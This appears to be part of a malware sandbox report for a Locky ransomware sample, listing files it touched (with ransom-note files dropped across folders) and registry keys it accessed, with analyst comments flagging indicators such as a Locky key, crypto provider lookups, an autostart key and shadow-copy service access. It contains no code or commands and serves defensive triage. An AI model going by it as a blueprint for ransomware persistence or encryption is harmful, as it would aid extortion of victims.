c:\Python27\Tools\pynche\X\rgb.txt<br />
c:\Python27\Tools\pynche\X\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\ArabicShaping.txt<br />
c:\Perl\perl\lib\unicore\auxiliary\GCBTest.txt<br />
c:\Perl\perl\lib\unicore\auxiliary\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\auxiliary\GraphemeBreakProperty.txt<br />
c:\Perl\perl\lib\unicore\auxiliary\SentenceBreakProperty.txt<br />
c:\Perl\perl\lib\unicore\auxiliary\WordBreakProperty.txt<br />
c:\Perl\perl\lib\unicore\BidiMirroring.txt<br />
c:\Perl\perl\lib\unicore\Blocks.txt<br />
c:\Perl\perl\lib\unicore\CaseFolding.txt<br />
c:\Perl\perl\lib\unicore\CJKRadicals.txt<br />
c:\PHP\news.txt<br />
c:\PHP\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\CompositionExclusions.txt<br />
c:\Perl\perl\lib\unicore\DAge.txt<br />
c:\Perl\perl\lib\unicore\DCoreProperties.txt<br />
c:\Documents and Settings\User\Cookies\user@www.bing[2].txt<br />
c:\Perl\perl\lib\unicore\DNormalizationProps.txt<br />
c:\Perl\perl\lib\unicore\EastAsianWidth.txt<br />
c:\Perl\perl\lib\unicore\extracted\DBidiClass.txt<br />
c:\Perl\perl\lib\unicore\extracted\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\extracted\DBinaryProperties.txt<br />
c:\Perl\perl\lib\unicore\extracted\DCombiningClass.txt<br />
c:\Perl\perl\lib\unicore\extracted\DDecompositionType.txt<br />
c:\Perl\perl\lib\unicore\extracted\DEastAsianWidth.txt<br />
c:\Perl\perl\lib\unicore\extracted\DGeneralCategory.txt<br />
c:\Perl\perl\lib\unicore\extracted\DJoinGroup.txt<br />
c:\Perl\perl\lib\unicore\extracted\DJoinType.txt<br />
c:\Perl\perl\lib\unicore\extracted\DLineBreak.txt<br />
c:\Perl\perl\vendor\lib\ppm.xml<br />
c:\Perl\perl\lib\unicore\extracted\DNumType.txt<br />
c:\Perl\perl\lib\unicore\extracted\DNumValues.txt<br />
c:\Perl\perl\lib\unicore\HangulSyllableType.txt<br />
c:\Documents and Settings\User\Cookies\user@serving-sys[1].txt<br />
c:\Perl\ppm\README.txt<br />
c:\Perl\ppm\_Locky_recover_instructions.txt<br />
c:\Perl\README.txt<br />
c:\Perl\perl\lib\unicore\LineBreak.txt<br />
c:\Perl\strawberry-merge-module.reloc.txt<br />
c:\Perl\strawberry-ui.reloc.txt<br />
c:\Perl\perl\lib\unicore\Index.txt<br />
c:\PHP\install.txt<br />
c:\PHP\license.txt<br />
c:\Python27\Tools\pynche\X\xlicense.txt<br />
c:\Python27\Tools\Scripts\README.txt<br />
c:\Python27\Tools\Scripts\_Locky_recover_instructions.txt<br />
c:\PHP\readme-redist-bins.txt<br />
c:\Perl\perl\lib\unicore\NameAliases.txt<br />
c:\Perl\perl\lib\unicore\NamedSequences.txt<br />
c:\Perl\perl\lib\unicore\NamedSqProv.txt<br />
c:\Perl\perl\lib\unicore\NamesList.txt<br />
c:\Python27\Lib\email\test\data\msg_01.txt<br />
c:\Python27\Lib\email\test\data\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\email\test\data\msg_02.txt<br />
c:\Python27\Lib\email\test\data\msg_03.txt<br />
c:\Python27\Lib\email\test\data\msg_04.txt<br />
c:\Python27\Lib\email\test\data\msg_05.txt<br />
c:\Python27\Lib\email\test\data\msg_06.txt<br />
c:\Python27\Lib\email\test\data\msg_07.txt<br />
c:\Python27\Lib\email\test\data\msg_08.txt<br />
c:\Python27\Lib\email\test\data\msg_09.txt<br />
c:\Python27\Lib\email\test\data\msg_10.txt<br />
c:\Python27\Lib\email\test\data\msg_11.txt<br />
c:\Python27\Lib\email\test\data\msg_12.txt<br />
c:\Python27\Lib\email\test\data\msg_12a.txt<br />
c:\Python27\Lib\email\test\data\msg_13.txt<br />
c:\Python27\Lib\email\test\data\msg_14.txt<br />
c:\Python27\Lib\email\test\data\msg_15.txt<br />
c:\Python27\Lib\email\test\data\msg_16.txt<br />
c:\Python27\Lib\email\test\data\msg_17.txt<br />
c:\Python27\Lib\email\test\data\msg_18.txt<br />
c:\Python27\Lib\email\test\data\msg_19.txt<br />
c:\Python27\Lib\email\test\data\msg_20.txt<br />
c:\Python27\Lib\email\test\data\msg_21.txt<br />
c:\Python27\Lib\email\test\data\msg_22.txt<br />
c:\Python27\Lib\email\test\data\msg_23.txt<br />
c:\Python27\Lib\email\test\data\msg_24.txt<br />
c:\Python27\Lib\email\test\data\msg_25.txt<br />
c:\Python27\Lib\email\test\data\msg_26.txt<br />
c:\Python27\Lib\email\test\data\msg_27.txt<br />
c:\Python27\Lib\email\test\data\msg_28.txt<br />
c:\Python27\Lib\email\test\data\msg_29.txt<br />
c:\Python27\Lib\email\test\data\msg_30.txt<br />
c:\Python27\Lib\email\test\data\msg_31.txt<br />
c:\Python27\Lib\email\test\data\msg_32.txt<br />
c:\Python27\Lib\email\test\data\msg_33.txt<br />
c:\Python27\Lib\email\test\data\msg_34.txt<br />
c:\Python27\Lib\email\test\data\msg_35.txt<br />
c:\Python27\Lib\email\test\data\msg_36.txt<br />
c:\Python27\Lib\email\test\data\msg_37.txt<br />
c:\Python27\Lib\email\test\data\msg_38.txt<br />
c:\Python27\Lib\email\test\data\msg_39.txt<br />
c:\Python27\Lib\email\test\data\msg_40.txt<br />
c:\Python27\Lib\email\test\data\msg_41.txt<br />
c:\Python27\Lib\email\test\data\msg_42.txt<br />
c:\Python27\Lib\email\test\data\msg_43.txt<br />
c:\Python27\Lib\email\test\data\msg_44.txt<br />
c:\Python27\Lib\email\test\data\msg_45.txt<br />
c:\Python27\Lib\email\test\data\msg_46.txt<br />
c:\Python27\Tools\versioncheck\README.txt<br />
c:\Python27\Tools\versioncheck\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\idlelib\CREDITS.txt<br />
c:\Python27\Lib\idlelib\extend.txt<br />
c:\Python27\Lib\idlelib\help.txt<br />
c:\Python27\Lib\idlelib\HISTORY.txt<br />
c:\Python27\Tools\webchecker\README.txt<br />
c:\Python27\Tools\webchecker\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\test\cjkencodings\gb18030.txt<br />
c:\Python27\Lib\test\cjkencodings\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\NormalizationCorrections.txt<br />
c:\Python27\Lib\idlelib\NEWS.txt<br />
c:\Python27\Lib\idlelib\README.txt<br />
c:\Python27\Lib\idlelib\TODO.txt<br />
c:\Python27\Lib\lib2to3\Grammar.txt<br />
c:\Python27\Lib\lib2to3\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\lib2to3\PatternGrammar.txt<br />
c:\Python27\Lib\site-packages\README.txt<br />
c:\Python27\Lib\site-packages\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\PropertyAliases.txt<br />
c:\Perl\perl\lib\unicore\PropList.txt<br />
c:\Perl\perl\lib\unicore\PropValueAliases.txt<br />
c:\Perl\perl\lib\unicore\ReadMe.txt<br />
c:\Python27\Lib\test\cjkencodings\big5-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\big5.txt<br />
c:\Python27\Lib\test\cjkencodings\big5hkscs-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\big5hkscs.txt<br />
c:\Python27\Lib\test\cjkencodings\cp949-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\cp949.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_jisx0213-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_jisx0213.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_jp-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_jp.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_kr-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_kr.txt<br />
c:\Python27\Lib\test\cjkencodings\gb18030-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\gb2312-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\gb2312.txt<br />
c:\Python27\Lib\test\cjkencodings\gbk-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\gbk.txt<br />
c:\Python27\Lib\test\cjkencodings\hz-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\hz.txt<br />
c:\Python27\Lib\test\cjkencodings\johab-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\johab.txt<br />
c:\Python27\Lib\test\cjkencodings\shift_jis-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\shift_jis.txt<br />
c:\Python27\Lib\test\cjkencodings\shift_jisx0213-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\shift_jisx0213.txt<br />
c:\Python27\Lib\test\cmath_testcases.txt<br />
c:\Perl\perl\lib\unicore\Scripts.txt<br />
c:\Python27\Lib\test\exception_hierarchy.txt<br />
c:\Python27\Lib\test\floating_points.txt<br />
c:\Python27\Lib\test\formatfloat_testcases.txt<br />
c:\Perl\perl\lib\unicore\SpecialCasing.txt<br />
c:\Python27\Lib\test\ieee754.txt<br />
c:\Perl\perl\lib\unicore\StandardizedVariants.txt<br />
c:\Python27\Lib\test\leakers\README.txt<br />
c:\Python27\Lib\test\leakers\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\test\math_testcases.txt<br />
c:\Perl\perl\lib\unicore\Jamo.txt<br />
c:\Documents and Settings\User\Cookies\user@scorecardresearch[2].txt<br />
c:\Documents and Settings\User\Cookies\user@msn[2].txt<br />
c:\Documents and Settings\User\Cookies\user@msnportal.112.2o7[1].txt<br />
c:\Python27\Lib\test\test_doctest.txt<br />
c:\Python27\Lib\test\test_doctest2.txt<br />
c:\Python27\Lib\test\test_doctest3.txt<br />
c:\Python27\Lib\test\test_doctest4.txt<br />
c:\Python27\Lib\test\tokenize_tests.txt<br />
c:\Python27\Lib\test\xmltestdata\simple-ns.xml<br />
c:\Python27\Lib\test\xmltestdata\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\test\xmltestdata\simple.xml<br />
c:\Python27\Lib\test\xmltestdata\test.xml<br />
c:\Python27\LICENSE.txt<br />
c:\Python27\_Locky_recover_instructions.txt<br />
c:\Python27\NEWS.txt<br />
c:\Python27\README.txt<br />
c:\Perl\perl\lib\Unicode\Collate\keys.txt<br />
c:\Perl\perl\lib\Unicode\Collate\_Locky_recover_instructions.txt<br />
c:\Documents and Settings\User\Cookies\user@microsoft[1].txt<br />
c:\Documents and Settings\User\Cookies\user@g.msn[1].txt<br />
c:\Documents and Settings\User\Cookies\user@doubleclick[1].txt<br />
c:\Documents and Settings\User\Cookies\user@c1.microsoft[2].txt<br />
c:\Documents and Settings\User\Cookies\user@c.msn[2].txt<br />
c:\Documents and Settings\User\Cookies\user@c.bing[2].txt<br />
c:\Perl\perl\vendor\lib\auto\share\dist\DBD-SQLite\sqlite3.c<br />
c:\Perl\c\i686-w64-mingw32\include\mshtmlc.h<br />
c:\Perl\c\i686-w64-mingw32\include\mshtml.h<br />
c:\Perl\perl\lib\unicore\TestProp.pl<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\_Locky_recover_instructions.txt<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg<br />
c:\Perl\perl\lib\Unicode\Collate\allkeys.txt<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg<br />
c:\Perl\perl\lib\unicore\UnicodeData.txt<br />
c:\Python27\tcl\tix8.4.3\bitmaps\minusarm.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\_Locky_recover_instructions.txt<br />
c:\Python27\tcl\tix8.4.3\bitmaps\no_entry.gif<br />
c:\PHP\php.gif<br />
c:\Python27\Lib\email\test\data\PyBanner048.gif<br />
c:\Python27\Lib\idlelib\Icons\folder.gif<br />
c:\Python27\Lib\idlelib\Icons\_Locky_recover_instructions.txt<br />
c:\Python27\tcl\tix8.4.3\bitmaps\plusarm.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\srcfile.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\textfile.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\warning.gif<br />
c:\Python27\tcl\tix8.4.3\demos\bitmaps\tix.gif<br />
c:\Python27\tcl\tix8.4.3\demos\bitmaps\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\idlelib\Icons\openfolder.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\openfold.gif<br />
c:\Python27\Lib\idlelib\Icons\plusnode.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\plus.gif<br />
c:\Python27\Lib\idlelib\Icons\python.gif<br />
c:\Python27\Lib\idlelib\Icons\tk.gif<br />
c:\Python27\tcl\tk8.5\demos\images\earth.gif<br />
c:\Python27\tcl\tk8.5\demos\images\_Locky_recover_instructions.txt<br />
c:\Python27\tcl\tk8.5\demos\images\earthris.gif<br />
c:\Python27\tcl\tk8.5\demos\images\tcllogo.gif<br />
c:\Python27\tcl\tk8.5\images\logo100.gif<br />
c:\Python27\tcl\tk8.5\images\_Locky_recover_instructions.txt<br />
c:\Python27\tcl\tk8.5\images\logo64.gif<br />
c:\Python27\tcl\tk8.5\images\logoLarge.gif<br />
c:\Python27\tcl\tk8.5\images\logoMed.gif<br />
c:\Python27\tcl\tk8.5\images\pwrdLogo100.gif<br />
c:\Python27\tcl\tk8.5\images\pwrdLogo150.gif<br />
c:\Python27\tcl\tk8.5\images\pwrdLogo175.gif<br />
c:\Python27\tcl\tk8.5\images\pwrdLogo200.gif<br />
c:\Python27\tcl\tk8.5\images\pwrdLogo75.gif<br />
c:\Python27\tcl\tk8.5\images\tai-ku.gif<br />
c:\Python27\Lib\idlelib\Icons\minusnode.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\act_fold.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\file.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\folder.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\info.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\minus.gif<br />
c:\Python27\Lib\test\testtar.tar<br />
c:\Python27\Lib\test\zipdir.zip<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Music\_Locky_recover_instructions.txt<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Music\Beethoven&#39;s Symphony No. 9 (Scherzo).wma<br />
C:\Documents and Settings\User\Desktop\_Locky_recover_instructions.txt<br />
C:\Documents and Settings\User\Desktop\_Locky_recover_instructions.bmp<br />
C:\DOCUME~1\User\LOCALS~1\Temp\65fg67n.exe<br />
C:\WINDOWS\system32\msctfime.ime<br />
C:\WINDOWS\system32\shimgvw.dll<br />
C:\WINDOWS\system32\shimgvw.dll.123.Manifest<br />
C:\WINDOWS\system32\shimgvw.dll.123.Config<br />
IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#42562d3231303037333036372020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<br />
STORAGE#Volume#1&amp;30a96598&amp;0&amp;Signature32B832B7Offset7E00Length27F4DB200#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<br />
C:\Documents and Settings\User<br />
C:\Documents and Settings\User\Desktop<br />
C:\WINDOWS\Registration\R000000000007.clb<br />
C:\WINDOWS\Resources\themes\Luna\Shell\NormalColor\ShellStyle.dll<br />
C:\Documents and Settings\User\Desktop\*.*<br />
C:\DOCUME~1<br />
C:\DOCUME~1\User<br />
C:\DOCUME~1\User\LOCALS~1<br />
</div>
</div>
<div class="tab-pane fade" id="summary_keys">
<!--
  Behavioural summary: registry keys recorded for the sample during the sandbox run.
  Only key paths are listed. This pane does not say whether a key was read, created
  or written, so confirm the operation in the per-process API trace before treating
  an entry as a modification.
  Triage note: most entries (Internet Settings, FeatureControl, Shell Folders, CLSID
  lookups) look like routine WinINet, shell and COM initialisation and carry little
  detection value on their own. Entries followed by NOTE(review) are the ones worth
  pivoting on.
-->
<div class="well mono">
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System<br />
HKEY_CURRENT_USER\Software\Locky<br />
<!-- NOTE(review): key named after the ransomware family, matching the _Locky_recover_instructions files in the file summary; a candidate host indicator. -->
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\SOFTWARE\Microsoft\Cryptography\Providers\Type 024<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)<br />
<!-- NOTE(review): RSA and AES provider lookup; consistent with use of the Windows CryptoAPI, presumably for file encryption. Confirm in the API trace. -->
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Offload<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\DESHashSessionKeyBackward<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName<br />
ActiveComputerName<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings<br />
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings<br />
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl<br />
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl<br />
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_LOCAL_MACHINE\System\Setup<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path1<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path2<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path3<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path4<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Special Paths<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014092220140929<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014092920140930<br />
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_AUTOPROXY_CACHE_ANAME_KB921400<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840387<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840386<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CHUNK_TIMEOUT_KB914453<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CERT_TRUST_VERIFIED_KB936882<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENSURE_FQDN_FOR_NEGOTIATE_KB899417<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_DISABLE_NTLM_PREAUTH_IF_ABORTED_KB902409<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WPAD_STORE_URL_AS_FQDN_KB903926<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_KEEP_CACHE_INDEX_OPEN_KB899342<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WAIT_TIME_THREAD_TERMINATE_KB886801<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Http Filters\RPA<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Http Filters\RPA<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\RASAPI32<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\windows\CurrentVersion\Internet Settings<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1547161642-507921405-839522115-1004<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\Winlogon<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Environment<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Volatile Environment<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections<br />
HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run<br />
<!-- NOTE(review): per-user autostart key. Its presence here does not prove a value was added; check the trace for a write to confirm persistence. -->
HKEY_LOCAL_MACHINE\system\CurrentControlSet<br />
HKEY_LOCAL_MACHINE\system\CurrentControlSet\control\NetworkProvider\HwOrder<br />
HKEY_LOCAL_MACHINE\system\CurrentControlSet\services\RDPNP\NetworkProvider<br />
HKEY_LOCAL_MACHINE\system\CurrentControlSet\services\LanmanWorkstation\NetworkProvider<br />
HKEY_LOCAL_MACHINE\system\CurrentControlSet\services\WebClient\NetworkProvider<br />
HKEY_CURRENT_USER\Control Panel\Desktop<br />
<!-- NOTE(review): desktop settings key; together with _Locky_recover_instructions.bmp on the Desktop in the file summary this may reflect a wallpaper change. Verify in the trace. -->
HKEY_LOCAL_MACHINE\SYSTEM\Setup<br />
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Debug\Tracing<br />
<!-- NOTE(review): Volume Shadow Copy service key; check the process tree for shadow copy removal, which would limit recovery options on an affected host. -->
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IMM<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\CTF<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\SystemShared<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\NOTEPAD.EXE<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}<br />
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32<br />
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions<br />
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}<br />
HKEY_CLASSES_ROOT\Directory<br />
HKEY_CLASSES_ROOT\Directory\CurVer<br />
HKEY_CLASSES_ROOT\Directory\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced<br />
HKEY_CLASSES_ROOT\Directory\\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\Directory\\Clsid<br />
HKEY_CLASSES_ROOT\Folder<br />
HKEY_CLASSES_ROOT\Folder\Clsid<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt<br />
HKEY_CLASSES_ROOT\.txt<br />
HKEY_CLASSES_ROOT\txtfile<br />
